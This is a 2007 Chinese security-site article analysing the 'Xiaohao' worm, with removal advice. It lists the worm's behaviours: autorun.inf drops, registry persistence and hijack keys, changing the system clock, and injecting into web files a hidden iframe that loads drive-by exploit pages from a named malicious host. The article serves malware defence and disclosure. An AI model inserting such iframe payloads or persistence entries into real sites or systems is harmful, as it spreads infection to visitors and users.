用户名:密 码:验证码 我要投稿 电脑技巧 信息订阅 高级搜索 网站地图 加入收藏
中国网管站 中国网管站发展目标  
我要学→
当前位置:中国网管站首页>网络安全>网络应用安全>文章内容

小浩蠕虫(xiaohao.exe)分析与解决方案(图)

来源: 作者: 发布时间:2007-10-26  (阅读次数:)  查看更多关于: 小浩蠕虫 (xiaohao.exe) 的文章
一、病毒描述:
          今日,DSW Lab Avert小组监测到一个具备较强破坏力的名为小浩的蠕虫病毒开始传播,该病毒类似此前曾肆虐网络的熊猫烧香病毒,破坏性感染系统文件,并在受害者系统上遍历网页/脚本文件,插入带毒的网址。因为病毒的破坏性感染行为,导致被感染文件无法修复,严重被感染系统无法使用,会导致用户无法开机现象。

           感染效果截图:

  二、病毒基本情况:
          病毒名称:Worm.Win32.Xiaohao.a
          病毒别名:小浩
          病毒类型:蠕虫
          危害级别:4
          感染平台:Windows 平台
           编写语言:C/C++

  三、病毒行为:
           1、当病毒体在被感染的系统上激活后,会在磁盘跟目录释放autorun.inf等文件,感染U盘等移动设备:
              %DRIVE%\autorun.inf 文件属性:H
              %DRIVE%\Xiaohao.exe 文件属性:H

           2、同时在跟目录释放一个名为Jilu.txt文件,记录了相关感染文件列表。
           3、拷贝自身到系统目录下,全路径: %SystemRoot%\system32\exloroe.exe
           4、将自动加入到注册表启动项确保自身启动激活:

             键路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components
               键名:{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
               键值:%SystemRoot%\system32\exloroe.exe

           5、将系统时间修改为2005年1月17日,会导致部分杀毒软件和其他正版软件因授权问题无法激活。
      
            6、全盘搜索扩展名为*.jsp、*.php、 *.aspx、 *.asp、 *.html、 *.htm的文件,向其中插入病毒网址。
               <iframe src=http://xiaohao.yona.biz/*.htm width=0 height=0></iframe>
               其中该恶意页面利用多个系统漏洞针对Windows 2000/XP/2003进行有针对性的挂马。

              恶意页面的代码截图:

           7、其它行为:
               修改注册表使系统无法正常浏览隐藏文件,修改注册表劫持正常的EXE运行,使得运行一些文件会先运行蠕虫自身:
               HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWAL
               shell\Auto\command=Xiaohao.exe
               shellexecute=Xiaohao.exe
               open=Xiaohao.exe
             当用户打开感染的文件夹时,资源管理器标题会被修改成:已中毒 X14o-H4o's Virus

  四、解决方案
          1、超级巡警已经紧急升级,请广大用户升级到最新特征库来预防病毒。
          2、对于网页被感染的用户,可以使用超级巡警的垃圾清理功能来批量修复被感染的网页,具体功能垃圾清理→智能扫描→清除指定代码,勾选后填入病毒植入的恶意网页,点击扫描→清除即可。
          3、不要运行来历不明的文件。 

感谢网友艾玛提供相关信息。      


上一篇:教你如何在Linux下查看已经安装了哪些软件?   下一篇:海尔官方网站首页被挂马(图)
[收藏] [推荐] [返回顶部][打印本页] [关闭窗口]  
  相关文章
·海尔官方网站首页被挂马(图)
·无忧校园网络解决方案(图)
·卡巴斯基vs莫名IE窗口弹出解决方
·“蘑菇”病毒解决方案(图)
·U盘(auto病毒)类病毒解析
·经典总结:各个网络端口的入侵方
·局域网盗用IP地址的安全问题解析
·"哈希信息窃取器"暴力破解主机用
·网络的最大威胁 间谍软件成为头
·IDS的缺陷成就了IPS的发展
·经验:避免危害DNS服务器安全部
·从程序的漏洞到服务器的安全渗透
·教你防御网络游戏外挂木马全攻略
·桌面管理能保证企业安全吗?
·解决企业网中存在的通病
·安全技巧:logogo.exe病毒的手动
·高效的NAC方案控制解决方案
·入侵盗QQ号者的网站,取回属于自
·江民升级后重启出现蓝屏的解决办
·DL1.exe U盘病毒的清除教程
  热点文章
·Sniffer Pro监控网络流量(图)
·手工杀毒必备工具!
·企业网络防病毒解决方案
·如何在局域网内防范DDOS攻击
·MSN小尾巴专杀
·Anti ARP Sniffer查找ARP攻击者(
·病毒和木马的隐藏技术解密
·修复任何品牌U盘的工具!Mformat
·如何给微软的软件全面快速地打安
·维护服务器安全的7大技巧
·系统加密
·主流杀毒软件备份全攻略
·拯救被封iPhone功能恢复有限
·怎样保护你的机密文件
·打造一道超级防御的电脑防火墙
·技术分析 TOR实现真正安全传输?(
·经典总结:各个网络端口的入侵方
·U盘(auto病毒)类病毒解析
·防范U盘病毒Autorun.inf的绝招
·合理配置防火墙是保证网络安全的
Copyright@2007 中国网管站 All Rights Reserved 陕ICP备07501327号
E-mail:qidian512@163.com 电话:13759975857
编辑负责QQ:347795937 251695990 技术交流群:45212068